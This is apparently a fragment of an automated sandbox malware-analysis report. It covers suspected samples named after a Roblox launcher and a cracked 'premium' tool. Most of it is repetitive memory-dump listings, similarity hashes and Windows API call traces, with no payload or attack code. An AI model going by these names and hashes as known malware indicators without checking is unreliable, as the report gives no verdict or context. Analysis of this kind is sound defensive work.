              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: __freea$AllocateHeap
              • String ID: |_j
              • API String ID: 2243444508-3413345523
              • Opcode ID: fc2f4a3fcc7a5815e3b9e6210019ff72cad9bafa709bd51451544d550873f4ce
              • Instruction ID: 180c1f5e02044f305d9e0c9eb026ab1f5668116b9bb62aa0c75aa94b1dc226ca
              • Opcode Fuzzy Hash: fc2f4a3fcc7a5815e3b9e6210019ff72cad9bafa709bd51451544d550873f4ce
              • Instruction Fuzzy Hash: 7751D372640216AFEF259F64DC81EFF3BA9EF44760B150129FD08EA190E771CC9087A0
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID:
              • String ID: |_j
              • API String ID: 0-3413345523
              • Opcode ID: 4b2051d776d028186eec515e51c9d7bf76cbdefbcf08fd7f86895f80c325d20c
              • Instruction ID: 6bb0c7ca02879a6d5c4c1cdec1da85ce13b0192f58078765d5c1052c442da3f1
              • Opcode Fuzzy Hash: 4b2051d776d028186eec515e51c9d7bf76cbdefbcf08fd7f86895f80c325d20c
              • Instruction Fuzzy Hash: 54A122B3E042459FDF25EFA8D8957EDBBF2AB45720F144029E405AB2A1DB319EC0CB51
              APIs
                • Part of subcall function 00A1FA3E: GetOEMCP.KERNEL32(00000000,?,?,?,?), ref: 00A1FA69
              • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,?,?,?,?,00A1FD55,?,00000000,?,?,?), ref: 00A1FF6F
              • GetCPInfo.KERNEL32(00000000,?,?,?,?,?,?,?,?,00A1FD55,?,00000000,?,?,?), ref: 00A1FFB1
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: CodeInfoPageValid
              • String ID: |_j
              • API String ID: 546120528-3413345523
              • Opcode ID: 491f94f9187c7f9b403b27cf28ce7468da2b71c6d12e5dbd39ac751e7425f33d
              • Instruction ID: 0706db39ccb35fe0e08e9cd6777cde495367d6901221eb14b4448205a724cd9b
              • Opcode Fuzzy Hash: 491f94f9187c7f9b403b27cf28ce7468da2b71c6d12e5dbd39ac751e7425f33d
              • Instruction Fuzzy Hash: AC51E170A042958EEB24CF79D885BFABBF5EF85300F18417ED0868B252D7799986CB50
              APIs
              • GetStringTypeW.KERNEL32(?,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A217FD
              • __freea.LIBCMT ref: 00A2180C
                • Part of subcall function 00A1A2F8: RtlAllocateHeap.NTDLL(00000000,00A053D6,00A19E0E,?,00A137ED,00B474D8,00000018,00000003), ref: 00A1A32A
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: AllocateHeapStringType__freea
              • String ID: |_j
              • API String ID: 4073780324-3413345523
              • Opcode ID: dc74ef1dbc3a81966631df0743c790f6754fbf6ea557636a2a99f5c26c2d4518
              • Instruction ID: b6503fa7d0d6cf41bd0eae94a9076be2e5ca171bd93640790c0a3435313a0a51
              • Opcode Fuzzy Hash: dc74ef1dbc3a81966631df0743c790f6754fbf6ea557636a2a99f5c26c2d4518
              • Instruction Fuzzy Hash: 5F31D071A0026AABCF219F69EC85EEF7BA9EF94710F050538F804A7250E734CD51CB90
              APIs
              • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 009E163E
              • ___raise_securityfailure.LIBCMT ref: 009E1726
              Strings
              Memory Dump Source
              • Source File: 00000001.00000002.1989337502.00000000006A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 006A0000, based on PE: true
              • Associated: 00000001.00000002.1989315110.00000000006A0000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1989890694.0000000000A47000.00000002.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990115211.0000000000B4B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990147817.0000000000B52000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990183090.0000000000BFD000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990204877.0000000000C03000.00000008.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C0C000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000C2A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000CB3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D90000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000D96000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000DE9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E3A000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000E8B000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000EDC000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F2D000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000F7E000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000000FCF000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001020000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001071000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000010C3000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001114000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001165000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000011B6000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001207000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001258000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012A9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012C9000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.00000000012CE000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001332000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1990226654.0000000001338000.00000004.00000001.01000000.00000005.sdmpDownload File
              • Associated: 00000001.00000002.1991280139.000000000133A000.00000002.00000001.01000000.00000005.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_1_2_6a0000_RobloxPlayerLauncher.jbxd
              Similarity
              • API ID: FeaturePresentProcessor___raise_securityfailure
              • String ID: |_j
              • API String ID: 3761405300-3413345523
              • Opcode ID: d5453c66add3ea316207b7eac0d2736ae15052fd74a773625ba6218cbe430d49
              • Instruction ID: 431206fbdaee62d6ca7376755de0eb8b9aea49ea81edcba13922891fc0bfbb23
              • Opcode Fuzzy Hash: d5453c66add3ea316207b7eac0d2736ae15052fd74a773625ba6218cbe430d49
              • Instruction Fuzzy Hash: E821F3F5911209DEE321CF99F956B457BECFB48700F14416AE905CBBA8D3B05A82DF48

              Execution Graph

              Execution Coverage:84.6%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:0%
              Total number of Nodes:5
              Total number of Limit Nodes:1

              Callgraph

              • Executed
              • Not Executed
              • Opacity -> Relevance
              • Disassembly available
              callgraph 0 Function_00401000 1 Function_00401AD8 1->0

              Control-flow Graph

              APIs
              • LoadIconA.USER32(00403000,000001F4), ref: 0040104C
              • LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
              • RegisterClassExA.USER32(00000030), ref: 0040106E
              • CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
              • ShowWindow.USER32(00000001,?), ref: 004010BC
              • UpdateWindow.USER32(00000001), ref: 004010C7
              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
              • TranslateMessage.USER32(?), ref: 004010E4
              • DispatchMessageA.USER32(?), ref: 004010ED
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.1763296134.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000002.00000002.1763234732.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763329434.0000000000402000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763357612.0000000000403000.00000004.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763357612.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763357612.0000000000410000.00000004.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763517996.0000000000411000.00000008.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1764513643.0000000000DC2000.00000004.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_AkrienPremiumCrackByHurminka.jbxd
              Similarity
              • API ID: MessageWindow$Load$ClassCreateCursorDispatchIconRegisterShowTranslateUpdate
              • String ID: 0$WinClass32
              • API String ID: 282685165-2329282442
              • Opcode ID: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
              • Instruction ID: 47d6b7d35728adeecb0fde599aadb8774aba34f0bad3284053c57367e6fa7a97
              • Opcode Fuzzy Hash: c6f244753a2bc84237680407939961650baec8381a8dcf39c5ba78c2ad2f1f46
              • Instruction Fuzzy Hash: 7D210C70D41249AAEF10EFD0CC46BDDBFB8AB04708F20802AF200BA1E5D7B96655DB5C

              Control-flow Graph

              APIs
              • GetCommandLineA.KERNEL32 ref: 00401AD8
              • GetModuleHandleA.KERNEL32(00000000), ref: 00401AE4
              • GetProcessHeap.KERNEL32(00000000), ref: 00401AEE
                • Part of subcall function 00401000: LoadIconA.USER32(00403000,000001F4), ref: 0040104C
                • Part of subcall function 00401000: LoadCursorA.USER32(00000000,00007F00), ref: 0040105B
                • Part of subcall function 00401000: RegisterClassExA.USER32(00000030), ref: 0040106E
                • Part of subcall function 00401000: CreateWindowExA.USER32(00000000,WinClass32,WinClass32,00CF0000,?,?,?,?,00000000,00000000,00403000,00000000), ref: 004010AA
                • Part of subcall function 00401000: ShowWindow.USER32(00000001,?), ref: 004010BC
                • Part of subcall function 00401000: UpdateWindow.USER32(00000001), ref: 004010C7
                • Part of subcall function 00401000: GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004010D6
                • Part of subcall function 00401000: TranslateMessage.USER32(?), ref: 004010E4
                • Part of subcall function 00401000: DispatchMessageA.USER32(?), ref: 004010ED
              • ExitProcess.KERNEL32(00000000,00000000,0000000A,00000000), ref: 00401B0F
              Memory Dump Source
              • Source File: 00000002.00000002.1763296134.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
              • Associated: 00000002.00000002.1763234732.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763329434.0000000000402000.00000002.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763357612.0000000000403000.00000004.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763357612.0000000000408000.00000004.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763357612.0000000000410000.00000004.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1763517996.0000000000411000.00000008.00000001.01000000.00000008.sdmpDownload File
              • Associated: 00000002.00000002.1764513643.0000000000DC2000.00000004.00000001.01000000.00000008.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_AkrienPremiumCrackByHurminka.jbxd
              Similarity
              • API ID: MessageWindow$LoadProcess$ClassCommandCreateCursorDispatchExitHandleHeapIconLineModuleRegisterShowTranslateUpdate
              • String ID:
              • API String ID: 673778540-0
              • Opcode ID: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
              • Instruction ID: 8dce49216dd7d9d4199a49ca56cfbc69a4ccef7545e9a5bd4d655d6bb2b69eda
              • Opcode Fuzzy Hash: becb866452694a3a7b1e3b16712e2c71598974007851497f18c905e52376158d
              • Instruction Fuzzy Hash: 50E06774A45300AAE7217F71AE02B193E75A74174AF00007BB601791F6EBB86A109B5D

              Execution Graph

              Execution Coverage:3.5%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:2.8%
              Total number of Nodes:719
              Total number of Limit Nodes:32
              execution_graph 23136 71c4b0 14 API calls ___std_exception_destroy 23127 9e211d 46 API calls Concurrency::cancel_current_task 23116 77da30 116 API calls 4 library calls 23137 9e2457 6 API calls std::_Locinfo::_Locinfo_dtor 23117 a133eb EnterCriticalSection LeaveCriticalSection std::_Lockit::_Lockit std::locale::_Setgloballocale 23128 8a8c00 120 API calls 4 library calls 23129 8b0e00 PostQueuedCompletionStatus EnterCriticalSection LeaveCriticalSection 23118 9e0ed2 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___security_init_cookie 22162 9fbece 22163 9fbee0 22162->22163 22166 9fbee9 22162->22166 22178 9fbd52 81 API calls 22163->22178 22165 9fbee6 22167 9fbefa 22166->22167 22170 9fbcf2 22166->22170 22171 9fbcfe std::locale::_Setgloballocale 22170->22171 22179 9fba3d EnterCriticalSection 22171->22179 22173 9fbd0c 22180 9fbe60 22173->22180 22177 9fbd2f 22178->22165 22179->22173 22181 9fbe75 std::locale::_Setgloballocale 22180->22181 22182 9fbe7c 22181->22182 22183 9fbe87 22181->22183 22200 9fbd52 81 API calls 22182->22200 22194 9fbdf7 22183->22194 22190 9fbea8 22208 a1b163 49 API calls 2 library calls 22190->22208 22192 9fbe82 22209 9fb4cb 22192->22209 22193 9fbd46 LeaveCriticalSection 22193->22177 22195 9fbe37 22194->22195 22196 9fbe10 22194->22196 22195->22192 22201 a13be2 22195->22201 22196->22195 22197 a13be2 45 API calls 22196->22197 22198 9fbe2c 22197->22198 22215 a0936c 22198->22215 22200->22192 22202 a13c03 22201->22202 22203 a13bee 22201->22203 22202->22190 22298 a0424a 14 API calls __floor_pentium4 22203->22298 22205 a13bf3 22299 9fb78f 45 API calls std::locale::_Setgloballocale 22205->22299 22207 a13bfe 22207->22190 22208->22192 22210 9fb4d7 22209->22210 22211 9fb4ee 22210->22211 22300 9fb576 45 API calls 2 library calls 22210->22300 22212 9fb501 22211->22212 22301 9fb576 45 API calls 2 library calls 22211->22301 22212->22193 22216 a09378 std::locale::_Setgloballocale 22215->22216 22217 a0943c 22216->22217 22219 a093cd 22216->22219 22225 a09380 22216->22225 22256 9fb712 45 API calls 2 library calls 22217->22256 22226 a1274b EnterCriticalSection 22219->22226 22221 a093d3 22222 a093f0 22221->22222 22227 a09474 22221->22227 22255 a09434 LeaveCriticalSection 22222->22255 22225->22195 22226->22221 22228 a09499 22227->22228 22250 a094bc 22227->22250 22229 a0949d 22228->22229 22231 a094fb 22228->22231 22271 9fb712 45 API calls 2 library calls 22229->22271 22232 a09512 22231->22232 22272 a098bb 47 API calls 22231->22272 22257 a08fc1 22232->22257 22236 a09562 